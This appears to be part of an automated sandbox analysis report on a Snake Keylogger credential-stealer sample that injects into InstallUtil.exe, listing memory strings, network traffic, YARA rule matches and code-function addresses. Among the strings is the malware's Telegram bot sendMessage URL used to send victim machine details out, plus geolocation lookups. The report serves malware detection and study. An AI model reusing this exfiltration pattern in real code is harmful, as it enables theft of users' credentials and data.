                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791DCA0 CreateProcessAsUserW,0_2_0791DCA0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00AF1EB00_2_00AF1EB0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00AF0C880_2_00AF0C88
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00AF0FA00_2_00AF0FA0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00E282E80_2_00E282E8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00E2CC900_2_00E2CC90
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00E275980_2_00E27598
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_00E27D000_2_00E27D00
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_04FECE9C0_2_04FECE9C
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_06121C000_2_06121C00
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_06121BD10_2_06121BD1
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_061200060_2_06120006
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_061200400_2_06120040
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_061296C70_2_061296C7
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_06121BF30_2_06121BF3
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07574E580_2_07574E58
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_075706E00_2_075706E0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0757F8480_2_0757F848
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07635C900_2_07635C90
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07630FC20_2_07630FC2
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07630FD00_2_07630FD0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_076943780_2_07694378
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0769C3780_2_0769C378
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_076932100_2_07693210
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0769E0300_2_0769E030
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0769D4100_2_0769D410
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0769E8A80_2_0769E8A8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_076932000_2_07693200
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0769E0160_2_0769E016
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07692CB50_2_07692CB5
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07918B380_2_07918B38
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791E3680_2_0791E368
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07910E010_2_07910E01
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791BA300_2_0791BA30
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791BDB00_2_0791BDB0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079135A80_2_079135A8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07916CE00_2_07916CE0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079100400_2_07910040
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07912B980_2_07912B98
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079133F00_2_079133F0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07912F500_2_07912F50
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07912F400_2_07912F40
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079116880_2_07911688
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079135980_2_07913598
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079131880_2_07913188
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07911DB80_2_07911DB8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07911DC80_2_07911DC8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079141580_2_07914158
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079131790_2_07913179
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791C5600_2_0791C560
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791289A0_2_0791289A
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079128A80_2_079128A8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07916CD10_2_07916CD1
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079140DD0_2_079140DD
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07917CF80_2_07917CF8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07917CE80_2_07917CE8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079134000_2_07913400
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0791A8380_2_0791A838
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_079100250_2_07910025
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07F54B880_2_07F54B88
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07F54B780_2_07F54B78
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07F5EAB00_2_07F5EAB0
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_076368570_2_07636857
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8A0884_2_00F8A088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8C1464_2_00F8C146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8D2784_2_00F8D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F853624_2_00F85362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8C4684_2_00F8C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8C7384_2_00F8C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F829E04_2_00F829E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F869A04_2_00F869A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8E9884_2_00F8E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8CA084_2_00F8CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8CCD84_2_00F8CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F86FC84_2_00F86FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8CFA94_2_00F8CFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8F6314_2_00F8F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8E97B4_2_00F8E97B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F8FA884_2_00F8FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F83E094_2_00F83E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05627D784_2_05627D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05628B584_2_05628B58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056277204_2_05627720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562E5784_2_0562E578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05620D484_2_05620D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05620D384_2_05620D38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562C1084_2_0562C108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056215E94_2_056215E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056215F84_2_056215F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056265C04_2_056265C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056241C84_2_056241C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056211A04_2_056211A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056241B84_2_056241B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562E5884_2_0562E588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562C5884_2_0562C588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056211904_2_05621190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562C5984_2_0562C598
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056234604_2_05623460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562BC674_2_0562BC67
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562DC684_2_0562DC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562BC784_2_0562BC78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056200404_2_05620040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562FC484_2_0562FC48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562DC574_2_0562DC57
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562FC584_2_0562FC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056260204_2_05626020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056260304_2_05626030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056200064_2_05620006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056230084_2_05623008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562A0E04_2_0562A0E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056208E14_2_056208E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562E0E84_2_0562E0E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056208F04_2_056208F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562E0F84_2_0562E0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562C0F84_2_0562C0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562A0D04_2_0562A0D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056204884_2_05620488
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056204984_2_05620498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562D3484_2_0562D348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056227484_2_05622748
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562B3484_2_0562B348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05628B494_2_05628B49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056227584_2_05622758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562B3584_2_0562B358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056253284_2_05625328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562F3284_2_0562F328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562D3374_2_0562D337
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562F3384_2_0562F338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056223004_2_05622300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056277114_2_05627711
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056253184_2_05625318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562B7E84_2_0562B7E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05622FF84_2_05622FF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05625BCA4_2_05625BCA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562F7C84_2_0562F7C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562D7C94_2_0562D7C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562B7DA4_2_0562B7DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05625BD84_2_05625BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562D7D84_2_0562D7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05622BA14_2_05622BA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05622BB04_2_05622BB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562F7B94_2_0562F7B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056257804_2_05625780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05626E604_2_05626E60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05624A684_2_05624A68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05626E704_2_05626E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05624A784_2_05624A78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05621A404_2_05621A40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05621A504_2_05621A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056246204_2_05624620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562CA284_2_0562CA28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562EA074_2_0562EA07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05626A0A4_2_05626A0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056246104_2_05624610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562CA174_2_0562CA17
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05626A184_2_05626A18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562EA184_2_0562EA18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056222F14_2_056222F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05624EC24_2_05624EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056272C84_2_056272C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562AEC84_2_0562AEC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05624ED04_2_05624ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562CEA74_2_0562CEA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05621EA84_2_05621EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562EEA84_2_0562EEA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562AEB74_2_0562AEB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562CEB84_2_0562CEB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_056272B84_2_056272B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0562EE974_2_0562EE97
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05621E984_2_05621E98
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1964651903.0000000000EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1973635431.00000000078C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBamokinepApp.dll< vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBamokinepApp.dll< vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 5qJ6QQTcRS.exe
